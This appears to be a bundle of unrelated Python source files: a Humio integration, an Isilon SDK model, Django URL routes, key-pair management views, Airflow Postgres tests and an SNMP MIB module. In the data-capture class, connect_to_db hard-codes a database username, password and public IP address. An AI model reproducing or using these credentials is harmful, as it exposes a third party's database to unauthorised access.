+ args.get("repository")
+ "/alertnotifiers/"
+ args.get("id")
)
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
if not response.text:
raise ValueError("Notifier with id " + str(args.get("id")) + " not found")
result = response.json()
markdown = tableToMarkdown("Humio Notifiers", result, removeNull=True)
outputs = {"Humio.Notifier(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def fetch_incidents(client, headers):
incidentquery = demisto.params().get("queryParameter")
incidentrepo = demisto.params().get("queryRepository")
timestampfrom = demisto.params().get("queryStartTime")
lastrun = demisto.getLastRun()
url = "/api/v1/repositories/" + incidentrepo + "/query"
headers["Accept"] = "application/json"
    # Cap the result at 50 events; incidentquery is rebuilt from the params on
    # every run, so appending head(50) does not accumulate across fetches.
incidentquery = incidentquery + "| head(50)"
backup_ts = int(datetime.now().timestamp()) * 1000
last_run_time = lastrun.get("time")
data = {
"queryString": incidentquery,
"end": "now",
"isLive": False,
"timeZoneOffsetMinutes": int(
demisto.params().get("queryTimeZoneOffsetMinutes")
),
}
if last_run_time is None:
# First run
data["start"] = timestampfrom
max_ts = 0
else:
data["start"] = int(last_run_time)
max_ts = int(last_run_time)
response = client.http_request("POST", url, data, headers)
if response.status_code == 200:
response_data = response.json()
for result in response_data:
ts = int(result.get("@timestamp", backup_ts))
if ts > max_ts:
max_ts = ts
max_ts += 1
demisto.setLastRun({"time": max_ts})
        return form_incidents(response_data)
else:
raise ValueError(
"Error in fetching incidents. Error from server was: " + str(response.text)
)
def create_incident_from_humioquery(incident):
occurred = datetime.fromtimestamp(incident["@timestamp"] / 1000.0).strftime(
"%Y-%m-%dT%H:%M:%SZ"
)
keys = incident.keys()
labels = []
for key in keys:
labels.append({"type": key, "value": str(incident[key])})
return {
"name": "Humio Incident {id}".format(id=incident["@id"]),
"labels": labels,
"rawJSON": json.dumps(incident),
"occurred": occurred,
}
def form_incidents(incidents):
returnableincidents = []
for item in incidents:
returnableincidents.append(create_incident_from_humioquery(item))
return returnableincidents
def main():
apikey = demisto.params().get("API-key")
baseserver = (
demisto.params()["url"][:-1]
if (demisto.params()["url"] and demisto.params()["url"].endswith("/"))
else demisto.params()["url"]
)
verify_certificate = not demisto.params().get("insecure", False)
proxies = handle_proxy()
headers = {}
headers["Content-Type"] = "application/json"
headers["Authorization"] = "Bearer " + apikey
command = demisto.command()
LOG(f"Command being called is {command}")
try:
client = Client(baseserver, verify_certificate, proxies)
commands = {
"humio-query": humio_query,
"humio-query-job": humio_query_job,
"humio-poll": humio_poll,
"humio-delete-job": humio_delete_job,
"humio-list-alerts": humio_list_alerts,
"humio-get-alert-by-id": humio_get_alert_by_id,
"humio-create-alert": humio_create_alert,
"humio-delete-alert": humio_delete_alert,
"humio-list-notifiers": humio_list_notifiers,
"humio-get-notifier-by-id": humio_get_notifier_by_id,
}
if command == "test-module":
results = test_module(client, headers)
return_outputs(results)
elif demisto.command() == "fetch-incidents":
demisto.incidents(fetch_incidents(client, headers))
elif command in commands:
return_outputs(*commands[command](client, demisto.args(), headers))
except Exception as e:
return_error(str(e))
if __name__ in ["__main__", "builtin", "builtins"]:
main()
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 9
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from isi_sdk_8_2_2.models.drives_drive_firmware_update_node_status import DrivesDriveFirmwareUpdateNodeStatus # noqa: F401,E501
class DrivesDriveFirmwareUpdateNode(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'error': 'str',
'id': 'int',
'lnn': 'int',
'status': 'DrivesDriveFirmwareUpdateNodeStatus'
}
attribute_map = {
'error': 'error',
'id': 'id',
'lnn': 'lnn',
'status': 'status'
}
def __init__(self, error=None, id=None, lnn=None, status=None): # noqa: E501
"""DrivesDriveFirmwareUpdateNode - a model defined in Swagger""" # noqa: E501
self._error = None
self._id = None
self._lnn = None
self._status = None
self.discriminator = None
if error is not None:
self.error = error
if id is not None:
self.id = id
if lnn is not None:
self.lnn = lnn
if status is not None:
self.status = status
@property
def error(self):
"""Gets the error of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Error message, if the HTTP status returned from this node was not 200. # noqa: E501
:return: The error of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: str
"""
return self._error
@error.setter
def error(self, error):
"""Sets the error of this DrivesDriveFirmwareUpdateNode.
Error message, if the HTTP status returned from this node was not 200. # noqa: E501
:param error: The error of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: str
"""
if error is not None and len(error) > 8192:
raise ValueError("Invalid value for `error`, length must be less than or equal to `8192`") # noqa: E501
if error is not None and len(error) < 0:
raise ValueError("Invalid value for `error`, length must be greater than or equal to `0`") # noqa: E501
self._error = error
@property
def id(self):
"""Gets the id of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Node ID (Device Number) of a node. # noqa: E501
:return: The id of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this DrivesDriveFirmwareUpdateNode.
Node ID (Device Number) of a node. # noqa: E501
:param id: The id of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: int
"""
if id is not None and id > 2147483647: # noqa: E501
raise ValueError("Invalid value for `id`, must be a value less than or equal to `2147483647`") # noqa: E501
if id is not None and id < 0: # noqa: E501
raise ValueError("Invalid value for `id`, must be a value greater than or equal to `0`") # noqa: E501
self._id = id
@property
def lnn(self):
"""Gets the lnn of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Logical Node Number (LNN) of a node. # noqa: E501
:return: The lnn of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: int
"""
return self._lnn
@lnn.setter
def lnn(self, lnn):
"""Sets the lnn of this DrivesDriveFirmwareUpdateNode.
Logical Node Number (LNN) of a node. # noqa: E501
:param lnn: The lnn of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: int
"""
if lnn is not None and lnn > 65535: # noqa: E501
raise ValueError("Invalid value for `lnn`, must be a value less than or equal to `65535`") # noqa: E501
if lnn is not None and lnn < 1: # noqa: E501
raise ValueError("Invalid value for `lnn`, must be a value greater than or equal to `1`") # noqa: E501
self._lnn = lnn
@property
def status(self):
"""Gets the status of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Drive firmware update status information. # noqa: E501
:return: The status of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: DrivesDriveFirmwareUpdateNodeStatus
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this DrivesDriveFirmwareUpdateNode.
Drive firmware update status information. # noqa: E501
:param status: The status of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: DrivesDriveFirmwareUpdateNodeStatus
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DrivesDriveFirmwareUpdateNode):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from django.conf.urls import url, include
from branches import region, branch, resource
urlpatterns = [
url(r'^$', region.region_list, name='branches'),
url(r'^region/add/$', region.region_add, name='region_add'),
url(r'^region/list/$', region.region_list, name='region_list'),
url(r'^region/branch_detail/(?P<region_id>\d+)/$', region.branch_detail, name='branch_detail'),
url(r'^region/edit/(?P<region_id>\d+)/$', region.region_edit, name='region_edit'),
url(r'^region/delete/$', region.region_del, name='region_del'),
url(r'^branch/add/$', branch.branch_add, name='branch_add'),
url(r'^branch/list/$', branch.branch_list, name='branch_list'),
url(r'^branch/edit/(?P<branch_id>\d+)/$', branch.branch_edit, name='branch_edit'),
url(r'^branch/delete/$', branch.branch_del, name='branch_del'),
url(r'^branch/export/$', branch.branch_export, name='branch_export'),
url(r'^branch/resource_detail/(?P<branch_id>\d+)/$', branch.resource_detail, name='resource_detail'),
url(r'^resource/add/$', resource.resource_add, name='resource_add'),
url(r'^resource/list/$', resource.resource_list, name='resource_list'),
url(r'^resource/edit/(?P<resource_id>\d+)/$', resource.resource_edit, name='resource_edit'),
url(r'^resource/delete/$', resource.resource_del, name='resource_del'),
url(r'^resource/export/$', resource.resource_export, name='resource_export'),
]
|
"""awards URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.auth import views
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
url(r'^admin/', admin.site.urls),
url('', include('project.urls')),
url(r'^accounts/', include('registration.backends.simple.urls')),
url(r'^logout/$', views.logout, {"next_page": '/'} ),
url(r'^api-token-auth/', obtain_auth_token),
]
|
import requests
import sqlalchemy
import xmltodict
from sqlalchemy import create_engine, MetaData
from collections import defaultdict
import datetime
from utils import *
class Capture(object):
def __init__(self,
schema,
database='projetocurio'
):
self.schema = schema
self.database = database
self.engine = self.connect_to_db()
self.meta = self.load_db_schema()
self.url = None
self.data = None
    def connect_to_db(self):
        # Credentials and host are hard-coded as in the original; only the
        # database name is taken from the constructor argument.
        return create_engine('postgresql://uploaddata:VgyBhu876%%%@104.155.150.247:5432/' + self.database)
    def load_db_schema(self):
        metadata = MetaData()
        metadata.reflect(self.engine, schema=self.schema)
        return metadata
def request(self, url):
data = requests.get(url)
if data.status_code == 200:
self.data = data.text
else:
self.data = None
def xml_to_dict(self):
self.data = xmltodict.parse(self.data)
def to_default_dict(self, list_of_dic):
return [defaultdict(lambda: None, dic) for dic in force_list(list_of_dic)]
def capture_data(self, url):
self.request(url)
self.xml_to_dict()
def insert_data(self, list_of_dic, table):
table_string = self.schema + '.' + table
with self.engine.connect() as conn:
print('inserting data')
for dic in list_of_dic:
conn.execute(self.meta.tables[table_string].insert(), dic)
print('closing connection')
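# Hedged usage sketch (not part of the original module): the intended capture
# flow. Instantiating Capture reflects the database schema, so the PostgreSQL
# instance configured in connect_to_db() must be reachable; the URL, XML keys
# and table name below are placeholders.
#
#     capture = Capture(schema='camara_v1')
#     capture.capture_data('http://example.org/some-endpoint.xml')
#     rows = capture.to_default_dict(capture.data['root']['item'])
#     capture.insert_data(rows, 'some_table')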
|
# -*- coding: utf-8 -*-
# Copyright 2013-2017 Ent. Services Development Corporation LP
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Pyramid views for Eucalyptus and AWS key pairs
"""
import simplejson as json
from boto.exception import BotoServerError
from pyramid.httpexceptions import HTTPFound
from pyramid.view import view_config
from pyramid.response import Response
from ..forms.keypairs import KeyPairForm, KeyPairImportForm, KeyPairDeleteForm
from ..i18n import _
from ..models import Notification
from ..views import BaseView, LandingPageView, JSONResponse
from . import boto_error_handler
class KeyPairsView(LandingPageView):
def __init__(self, request):
super(KeyPairsView, self).__init__(request)
self.title_parts = [_(u'Key Pairs')]
self.initial_sort_key = 'name'
self.prefix = '/keypairs'
self.delete_form = KeyPairDeleteForm(self.request, formdata=self.request.params or None)
self.enable_smart_table = True
@view_config(route_name='keypairs', renderer='../templates/keypairs/keypairs.pt')
def keypairs_landing(self):
json_items_endpoint = self.request.route_path('keypairs_json')
# filter_keys are passed to client-side filtering in search box
self.filter_keys = ['name', 'fingerprint']
# sort_keys are passed to sorting drop-down
self.sort_keys = [
dict(key='name', name=_(u'Name: A to Z')),
dict(key='-name', name=_(u'Name: Z to A')),
]
return dict(
filter_keys=self.filter_keys,
search_facets=[],
sort_keys=self.sort_keys,
prefix=self.prefix,
initial_sort_key=self.initial_sort_key,
json_items_endpoint=json_items_endpoint,
delete_form=self.delete_form,
)
class KeyPairsJsonView(BaseView):
def __init__(self, request):
super(KeyPairsJsonView, self).__init__(request)
self.conn = self.get_connection()
@view_config(route_name='keypairs_json', renderer='json', request_method='POST')
def keypairs_json(self):
if not(self.is_csrf_valid()):
return JSONResponse(status=400, message="missing CSRF token")
keypairs = []
with boto_error_handler(self.request):
for keypair in self.get_items():
keypairs.append(dict(
name=keypair.name,
fingerprint=keypair.fingerprint,
))
return dict(results=keypairs)
def get_items(self):
ret = []
if self.conn:
ret = self.conn.get_all_key_pairs()
return ret
class KeyPairView(BaseView):
"""Views for single Key Pair"""
TEMPLATE = '../templates/keypairs/keypair_view.pt'
def __init__(self, request):
super(KeyPairView, self).__init__(request)
keyname = '/'.join(self.request.subpath)
if keyname == 'new':
keyname = _(u'Create')
if keyname == 'new2':
keyname = _(u'Import')
self.title_parts = [_(u'Key Pair'), keyname]
self.conn = self.get_connection()
self.keypair = self.get_keypair()
self.keypair_route_id = '/'.join(self.request.subpath)
self.keypair_form = KeyPairForm(self.request, keypair=self.keypair, formdata=self.request.params or None)
self.keypair_import_form = KeyPairImportForm(
self.request, keypair=self.keypair, formdata=self.request.params or None)
self.delete_form = KeyPairDeleteForm(self.request, formdata=self.request.params or None)
self.new_keypair_created = True if self._has_file_() else False # Detect if session has new keypair material
        self.created_msg = _(u'Successfully created key pair {keypair}').format(keypair=self.keypair_route_id)
controller_options_json = BaseView.escape_json(json.dumps({
'route_id': self.keypair_route_id,
'keypair_created': self.new_keypair_created,
'keypair_created_msg': self.created_msg,
}))
self.render_dict = dict(
keypair=self.keypair,
keypair_name=self.escape_braces(self.keypair.name) if self.keypair else '',
keypair_route_id=self.keypair_route_id,
keypair_form=self.keypair_form,
keypair_import_form=self.keypair_import_form,
keypair_created=self.new_keypair_created,
delete_form=self.delete_form,
keypair_names=self.get_keypair_names(),
controller_options_json=controller_options_json,
)
def get_keypair(self):
keypair_param = '/'.join(self.request.subpath)
if keypair_param == "new" or keypair_param == "new2":
return None
keypairs_param = [keypair_param]
keypairs = []
if self.conn:
try:
keypairs = self.conn.get_all_key_pairs(keynames=keypairs_param)
except BotoServerError:
return None
keypair = keypairs[0] if keypairs else None
return keypair
@view_config(route_name='keypair_view', renderer=TEMPLATE)
def keypair_view(self):
return self.render_dict
def get_keypair_names(self):
keypairs = []
with boto_error_handler(self.request):
if self.conn:
keypairs = [k.name for k in self.conn.get_all_key_pairs()]
return sorted(set(keypairs))
@view_config(route_name='keypair_create', request_method='POST', renderer=TEMPLATE)
def keypair_create(self):
if self.keypair_form.validate():
name = self.request.params.get('name')
location = self.request.route_path('keypair_view', subpath=name)
with boto_error_handler(self.request, location):
self.log_request(_(u"Creating keypair ") + name)
new_keypair = self.conn.create_key_pair(name)
# Store the new keypair material information in the session
self._store_file_(new_keypair.name + ".pem",
'application/x-pem-file;charset=ISO-8859-1',
new_keypair.material)
msg_template = _(u'Successfully created key pair {keypair}')
msg = msg_template.format(keypair=name)
if self.request.is_xhr:
resp_body = json.dumps(dict(message=msg))
return Response(status=200, body=resp_body, content_type='application/x-pem-file;charset=ISO-8859-1')
else:
location = self.request.route_path('keypair_view', subpath=name)
return HTTPFound(location=location)
if self.request.is_xhr:
form_errors = ', '.join(self.keypair_form.get_errors_list())
return JSONResponse(status=400, message=form_errors) # Validation failure = bad request
else:
self.request.error_messages = self.keypair_form.get_errors_list()
return self.render_dict
@view_config(route_name='keypair_import', request_method='POST', renderer=TEMPLATE)
def keypair_import(self):
if self.keypair_form.validate():
name = self.request.params.get('name')
key_material = self.request.params.get('key_material')
# Return to import form if failure
failure_location = self.request.route_path('keypair_view', subpath='new2')
success_location = self.request.route_path('keypair_view', subpath=name)
with boto_error_handler(self.request, failure_location):
self.log_request(_(u"Importing keypair ") + name)
self.conn.import_key_pair(name, key_material)
msg_template = _(u'Successfully imported key pair {keypair}')
msg = msg_template.format(keypair=name)
self.request.session.flash(msg, queue=Notification.SUCCESS)
return HTTPFound(location=success_location)
return self.render_dict
@view_config(route_name='keypair_delete', request_method='POST', renderer=TEMPLATE)
def keypair_delete(self):
if self.delete_form.validate():
keypair_name_param = self.request.params.get('name')
keypair_names = [keypair.strip() for keypair in keypair_name_param.split(',')]
location = self.request.route_path('keypairs')
with boto_error_handler(self.request, location):
for keypair_name in keypair_names:
self.log_request(_(u"Deleting keypair ") + keypair_name)
self.conn.delete_key_pair(keypair_name)
prefix = _(u'Successfully deleted keypair')
if len(keypair_names) == 1:
msg = prefix
else:
msg = u'{0} {1}'.format(prefix, ', '.join(keypair_names))
self.request.session.flash(msg, queue=Notification.SUCCESS)
return HTTPFound(location=location)
return self.render_dict
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import mock
import unittest
from tempfile import NamedTemporaryFile
import psycopg2.extras
import pytest
from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import Connection
class TestPostgresHookConn(unittest.TestCase):
def setUp(self):
super(TestPostgresHookConn, self).setUp()
self.connection = Connection(
login='login',
password='password',
host='host',
schema='schema'
)
class UnitTestPostgresHook(PostgresHook):
conn_name_attr = 'test_conn_id'
self.db_hook = UnitTestPostgresHook()
self.db_hook.get_connection = mock.Mock()
self.db_hook.get_connection.return_value = self.connection
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn_non_default_id(self, mock_connect):
self.db_hook.test_conn_id = 'non_default'
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user='login', password='password',
host='host', dbname='schema',
port=None)
self.db_hook.get_connection.assert_called_once_with('non_default')
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn(self, mock_connect):
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user='login', password='password', host='host',
dbname='schema', port=None)
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn_cursor(self, mock_connect):
self.connection.extra = '{"cursor": "dictcursor"}'
self.db_hook.get_conn()
mock_connect.assert_called_once_with(cursor_factory=psycopg2.extras.DictCursor,
user='login', password='password', host='host',
dbname='schema', port=None)
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn_with_invalid_cursor(self, mock_connect):
self.connection.extra = '{"cursor": "mycursor"}'
with self.assertRaises(ValueError):
self.db_hook.get_conn()
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
@mock.patch('airflow.contrib.hooks.aws_hook.AwsHook.get_client_type')
def test_get_conn_rds_iam_postgres(self, mock_client, mock_connect):
self.connection.extra = '{"iam":true}'
mock_client.return_value.generate_db_auth_token.return_value = 'aws_token'
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user='login', password='aws_token', host='host',
dbname='schema', port=5432)
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
@mock.patch('airflow.contrib.hooks.aws_hook.AwsHook.get_client_type')
def test_get_conn_rds_iam_redshift(self, mock_client, mock_connect):
self.connection.extra = '{"iam":true, "redshift":true}'
self.connection.host = 'cluster-identifier.ccdfre4hpd39h.us-east-1.redshift.amazonaws.com'
login = 'IAM:{login}'.format(login=self.connection.login)
mock_client.return_value.get_cluster_credentials.return_value = {'DbPassword': 'aws_token',
'DbUser': login}
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user=login, password='aws_token', host=self.connection.host,
dbname='schema', port=5439)
class TestPostgresHook(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestPostgresHook, self).__init__(*args, **kwargs)
self.table = "test_postgres_hook_table"
def setUp(self):
super(TestPostgresHook, self).setUp()
self.cur = mock.MagicMock()
self.conn = conn = mock.MagicMock()
self.conn.cursor.return_value = self.cur
class UnitTestPostgresHook(PostgresHook):
conn_name_attr = 'test_conn_id'
def get_conn(self):
return conn
self.db_hook = UnitTestPostgresHook()
def tearDown(self):
super(TestPostgresHook, self).tearDown()
with PostgresHook().get_conn() as conn:
with conn.cursor() as cur:
cur.execute("DROP TABLE IF EXISTS {}".format(self.table))
@pytest.mark.backend("postgres")
def test_copy_expert(self):
m = mock.mock_open(read_data='{"some": "json"}')
with mock.patch('airflow.hooks.postgres_hook.open', m):
statement = "SQL"
filename = "filename"
self.cur.fetchall.return_value = None
self.assertEqual(None, self.db_hook.copy_expert(statement, filename, open=m))
assert self.conn.close.call_count == 1
assert self.cur.close.call_count == 1
assert self.conn.commit.call_count == 1
self.cur.copy_expert.assert_called_once_with(statement, m.return_value)
self.assertEqual(m.call_args[0], (filename, "r+"))
@pytest.mark.backend("postgres")
def test_bulk_load(self):
hook = PostgresHook()
input_data = ["foo", "bar", "baz"]
with hook.get_conn() as conn:
with conn.cursor() as cur:
cur.execute("CREATE TABLE {} (c VARCHAR)".format(self.table))
conn.commit()
with NamedTemporaryFile() as f:
f.write("\n".join(input_data).encode("utf-8"))
f.flush()
hook.bulk_load(self.table, f.name)
cur.execute("SELECT * FROM {}".format(self.table))
results = [row[0] for row in cur.fetchall()]
self.assertEqual(sorted(input_data), sorted(results))
@pytest.mark.backend("postgres")
def test_bulk_dump(self):
hook = PostgresHook()
input_data = ["foo", "bar", "baz"]
with hook.get_conn() as conn:
with conn.cursor() as cur:
cur.execute("CREATE TABLE {} (c VARCHAR)".format(self.table))
values = ",".join("('{}')".format(data) for data in input_data)
cur.execute("INSERT INTO {} VALUES {}".format(self.table, values))
conn.commit()
with NamedTemporaryFile() as f:
hook.bulk_dump(self.table, f.name)
f.seek(0)
results = [line.rstrip().decode("utf-8") for line in f.readlines()]
self.assertEqual(sorted(input_data), sorted(results))
|
from .idw import inverse_distance_weighting
|
#
# PySNMP MIB module IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:56:57 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "ValueRangeConstraint")
cjnMgmt, = mibBuilder.importSymbols("Cajun-ROOT", "cjnMgmt")
NetNumber, = mibBuilder.importSymbols("IPX-PRIVATE-MIB", "NetNumber")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Counter32, Bits, Unsigned32, Gauge32, IpAddress, ObjectIdentity, Integer32, NotificationType, MibIdentifier, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Counter64, iso = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "Bits", "Unsigned32", "Gauge32", "IpAddress", "ObjectIdentity", "Integer32", "NotificationType", "MibIdentifier", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Counter64", "iso")
DisplayString, RowStatus, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "RowStatus", "TextualConvention")
cjnIpxIfMgmt = ModuleIdentity((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2))
if mibBuilder.loadTexts: cjnIpxIfMgmt.setLastUpdated('9904010000Z')
if mibBuilder.loadTexts: cjnIpxIfMgmt.setOrganization("Lucent's Concord Technology Center (CTC)")
if mibBuilder.loadTexts: cjnIpxIfMgmt.setContactInfo('Marc Cochran -- mcochran@lucent.com')
if mibBuilder.loadTexts: cjnIpxIfMgmt.setDescription('Cajun Private IPX Interface Management MIB')
cjnIpxIfGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1))
cjnIpxIfNextIndex = MibScalar((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfNextIndex.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfNextIndex.setDescription('The next available IfIndex. This number should be used to create new rows in the IpxIfTable.')
cjnIpxIfNumber = MibScalar((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfNumber.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfNumber.setDescription('The number of IPX interfaces.')
cjnIpxIfTable = MibTable((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3), )
if mibBuilder.loadTexts: cjnIpxIfTable.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfTable.setDescription('A list of Cajun IPX interface entries. The number of entries is given by the value of cjnIpxIfNumber.')
cjnIpxIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1), ).setIndexNames((0, "IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB", "cjnIpxIfIndex"))
if mibBuilder.loadTexts: cjnIpxIfEntry.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfEntry.setDescription('A Cajun IPX interface instance.')
cjnIpxIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfIndex.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfIndex.setDescription("The globally unique identifier for this interface. This number MUST correlate with the IfTable's IfIndex in MIB-II or RFC2233.")
cjnIpxIfRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfRowStatus.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfRowStatus.setDescription('The status of this row, by which new entries may be created, or old entries deleted from this table.')
cjnIpxIfNetNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 3), NetNumber()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfNetNumber.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfNetNumber.setDescription('The IPX network number associated with this IPX interface.')
cjnIpxIfEncapsType = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("ethernetV2", 1), ("ethernet8022", 2), ("ethernetSNAP", 3), ("ethernet8023", 4))).clone('ethernetV2')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfEncapsType.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfEncapsType.setDescription('The Ethernet encapsulation type used on this IPX interface.')
